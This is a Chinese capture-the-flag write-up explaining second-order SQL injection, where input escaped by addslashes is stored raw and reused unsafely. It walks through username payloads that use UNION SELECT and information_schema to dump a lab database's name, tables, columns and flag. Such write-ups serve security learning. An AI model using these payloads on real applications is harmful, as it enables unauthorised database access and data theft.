当前位置:网站首页>October 2019 Twice SQL Injection
October 2019 Twice SQL Injection
2022-08-03 21:55:00 【茶经新读.】
October 2019 Twice SQL Injection
题目提示我们是二次注入(SQL注入(二次注入) - 知乎),二次注入漏洞是一种在Web应用程序中广泛存在的安全漏洞形式。
二次注入的原理:
在第一次进行数据库插入数据的时候,仅仅只是使用了addslashes或者是借助get_magic_quotes_gpc对其中的特殊字符进行了转义,但是addslashes有一个特点就是虽然参数在过滤后会添加"\"进行转义,但是"\"并不会插入到数据库中,再写入数据库的时候还是保留了原来的数据。
在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候直接从数据库中取除了“脏”数据,并没有进行进一步的检验和处理,这样就会造成SQL的二次注入。比如在第一次插入数据的时候,数据中有单引号,直接插入到了数据库中;然后再下一次使用中在拼凑的过程中就形成了二次注入。

随意注册一个账户然后登录,输入sql语句,发现服务器将我们的单引号用\转义,并没有过滤关键字

这时我们需要注册恶意用户名来登录获得我们想知道的内容
注册用户名为1' union select database() #,密码为a的用户

返回到登录页面输入刚才注册的用户名(1' union select database() #)和密码(a)

登录发现爆出了数据库ctftraining

使用同样的方法来爆表:用户名:1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #,密码:a,注册登录


得到flag,news,users三个表

查一下flag表的字段:用户名:1' union select group_concat(column_name) from information_schema.columns where table_name='flag' #,密码:a,同样的注册登录


得到flag字段

查看一下flag字段的内容:用户名:1' union select flag from flag #,密码:a


得到flag

至此结束,撒花
边栏推荐
猜你喜欢

解决npm -v查看npm版本出现npm WARN config global `--global`, `--local` are deprecated. Use `--location报错

CAS: 1192802-98-4 _uv cracking of biotin - PEG2 - azide

DO280管理和监控OpenShift平台--资源限制

XSS holes emersion

一些思考:腾讯股价为何持续都低

1 秒完成授权,Authing 全新上线一键登录功能

【kali-漏洞扫描】(2.1)Nessus下载安装(上)

数据一致性:双删为什么要延时?

XSS线上靶场---haozi

LVS负载均衡集群
随机推荐
4. 模块化编程
距LiveVideoStackCon 2022 上海站开幕还有2天!
剑指 Offer 16. 数值的整数次方
七夕快乐!
A. Color the Picture- Codeforces Round #810 (Div. 1)
CAS: 773888-45-2_BIOTIN ALKYNE_生物素-炔基
XSS线上靶场---haozi
深度学习和机器学习有什么区别?
软考系统分析师备考经验分享:论持久战
CAS:122567-66-2_DSPE-Biotin_DSPE-Biotin
Android build error: Plugin with id 'kotlin-android' not found.
382. Linked List Random Node
剑指 Offer 07. 重建二叉树
E-commerce data warehouse ODS layer-----log data loading
dataframe multi-level index replace index df.swaplevel(axis=1)
用于流动质押和收益生成的 Web3 基础设施
Flink--Join以及Flink函数
Data_web(九)mongodb增量同步到mongodb
dataframe 多层索引 更换索引 df.swaplevel(axis=1)
DO280管理和监控OpenShift平台--资源限制